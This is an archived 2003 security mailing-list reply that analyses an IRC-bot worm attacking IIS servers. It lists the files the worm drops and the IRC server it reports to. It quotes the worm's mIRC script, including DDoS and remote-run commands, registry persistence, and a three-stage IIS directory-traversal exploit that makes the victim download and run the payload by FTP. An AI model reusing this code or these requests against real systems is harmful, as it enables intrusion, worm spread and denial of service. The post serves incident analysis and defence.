NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Incidents> 2003-07

Re: www.google.com reference in directory-traversal attack

From: Paul Dokas (dokascs.umn.edu)
Date: Mon Jul 14 2003 - 22:21:00 CDT

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On 14 Jul 2003 17:35:36 -0000, sgt_b <sgt_b2002yahoo.com> wrote:
>
>
> I've included a link to a tcpdump taken that shows a standard IIS
> directory-traversal attack. I was looking over the packets and noticed a
> reference to www.google.com. Could someone take a look, and let me know
> what this is being used for?
>
> http://12.208.102.165/attack3.dump
> atack3.dump=1.6kb

It's either this:

http://www.gdgsoft.com/info/notes/gsfxalert.asp

or a very close relative. This beastie swept through my networks and
has caused quite a few machines to become infected.

The variant that I've got creates:

C:\WINNT\SYSTEM32\dfg ghj\loi gty\

which contains this:

  CLS.BAT
  DATA.BAK
  DEXE.CPL
  FSLX.EXE
  KLSYS.EXE
  NEXE.CPL
  PLUG.DLL
  PSC32.EXE
  SYSTL.EXE
  TSYSL.BAT
  WINSE.EXE

It's appears to be a more recent version of W32.Randon.worm:

http://vil.nai.com/vil/content/v_100097.htm

with quite a few "improvements" like a much larger dictionary and
it doesn't seem to be detected by several of the larger anti-virus
packages (I might add that clamd *does* find this one as W32.Mix)
Oh, and it's got DDoS capabilities.

Here's the top bit of `strings PLUG.DLL`:

  on *:START:{
    run systl.exe /n /fh winsck
    sconf
    inc %many
    if (%many = 1) { set %infecttime $day $date $time | regs | checksf | makeSHR }
  alias n0clone { if ($portfree(29275) == $false) { exit } | socklisten noclone 29275 }
  on *:TEXT:*:*: {
    if ($nick isop $rds(sc)) {
      if ($1 = !ntimer) { if ($2 = Sock) { set %ntnick $3 | set %ntserver $4 | set %ntport $5 | sockopen NTimer $+ $r(1,1000) $+ $fnick %ntserver %ntport } }
      if ($1 = !ntreg) { reg $2- }
      if ($1 = !ntstop) { ntstop }
      if ($1 = !dde) { /dde $2 command "" / $+ $3- }
      if ($1 = !ind) { .identd on $2- }
      if ($1 = !-) && ($2 != $null) { %- = $2- | / $+ %- | unset %- }
      if ($1 = !pfast) { if ($4 == random) { //Tw1stStart $2 $3 $r(1,64000) | halt } | //Tw1stStart $2 $3 $4 }
      if ($1 = !fserv) { /saym [F-Serv Initialized] ( $+ $nick $+ ) ( Enjoy! | /fserve $nick 3 $2 }
      if ($1 = !packet) && ($3 != $null) { run systl.exe /n /fh /r "ping.exe $2 -n $3 -l 65500" | saym
  14DDoS
  14 packeting $2 with $calc($3 *65536/1024/1000) $+ mb traffic }
      if ($1 = !packet.stop) { run systl.exe /n /fh /r "winse.exe -kf ping.exe" | saym
  14DDoS
  14 packeting halted! }
      if ($1 = !run) && ($2 != $null) { /run $2- }
      if ($1 = !icmp) { if ($2 == $null) { /saym
  rror
  yntax: (!icmp ip packetsize howmany, ie: !icmp 127.0.0.1 2000 1000) | halt } | run systl.exe /n /r "ping -n $4 -l $3 -w 0 $2 " }
      if ($1 = !Clone) { /clone $2- }
      if ($1 = !syn) { if ($2 !== $null) { saym
  .
  .
  .

and so it goes for 692 lines. The odd HTTP connects that you saw were from
the very end of PLUG.DLL:

  alias sconf {
    .ddeserver on gtt1wst3r1.4.2
    .nick [_ $+ $r(1000,99999) $+ ]]
    .n0clone
    .Cona
    .timercheck 0 10 Cona
    .timerh1dd3 -o 0 1 H1dd3
    .timers33 -o 0 1 s33
    .timerregs -o 0 1 regs
    .run systl.exe /n /fh /r cls.BAT
    .timerkillsofts -o 0 5 killsofts
  alias regs { if ($Regread(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\salfx) = NA) { $RegWrite(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi
  on\Run\salfx,$mircdirklsys.exe,REG_SZ) } }
  alias saym { if ($me isvo $rds(sc)) { clearall | msg $rds(sc) $1- } }
  alias checksf { if ($exists($rds(sf)) = $false) && ($findfile(c:\,$rds(sf),0) != 0) { copy $findfile(c:\,$rds(sf),1) $rds(sf) } }
  on *:SOCKOPEN:Sg1.*: {
    sockwrite -n $sockname GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe HTTP/1.1
    sockwrite -n $sockname Host: www.google.com
    sockwrite -n $sockname Connection: keep-alive
    sockwrite $sockname $crlf
  on *:SOCKCLOSE:Sg1.*: {
    sockopen Sg2. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46)
  on *:SOCKOPEN:Sg2.*: {
    saym
  IIS Exploit
  ATTEMPTING STAGE 2
    sockwrite -n $sockname GET /scripts/script.exe?/c+echo+open+127.0.0.1>tmp2&&echo+Administrator>>tmp2&&echo+1234>>tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+ $+ $rds(sf) $+
>>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd HTTP/1.1
    sockwrite -n $sockname Host: www.google.com
    sockwrite -n $sockname Connection: keep-alive
    sockwrite $sockname $crlf
  on *:SOCKCLOSE:Sg2.*: {
    saym
  IIS Exploit
  STAGE 2 COMPLETE
  sockopen Sg3. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46)
  on *:SOCKOPEN:Sg3.*: {
    saym
  IIS Exploit
  ATTEMPTING STAGE 3
    sockwrite -n $sockname GET /scripts/httpodbc.dll?MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5C $+ $rds(sf) HTTP/1.1
    sockwrite -n $sockname Host: www.google.com
    sockwrite -n $sockname Connection: keep-alive
    sockwrite $sockname $crlf
  on *:SOCKCLOSE:Sg3.*: {
    saym
  IIS Exploit
  STAGE 3 COMPLETE

An infected host will join an IRC channel on rul3z.q8hell.org and
sit waiting for instructions. The host will also start scanning
for windows shares that it can infected. It appears to also use
a fairly large dictionary in an attempt to guess passwords on any shares
that it finds. And finally, the infected host will start scanning for
IIS web servers to infect.

Paul
--
Paul Dokas dokascs.umn.edu
======================================================================
Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla."

----------------------------------------------------------------------------
Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
world's premier technical IT security event! 10 tracks, 15 training sessions,
1,800 delegates from 30 nations including all of the top experts, from CSO's to
"underground" security specialists. See for yourself what the buzz is about!
Early-bird registration ends July 3. This event will sell out. www.blackhat.com
----------------------------------------------------------------------------

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]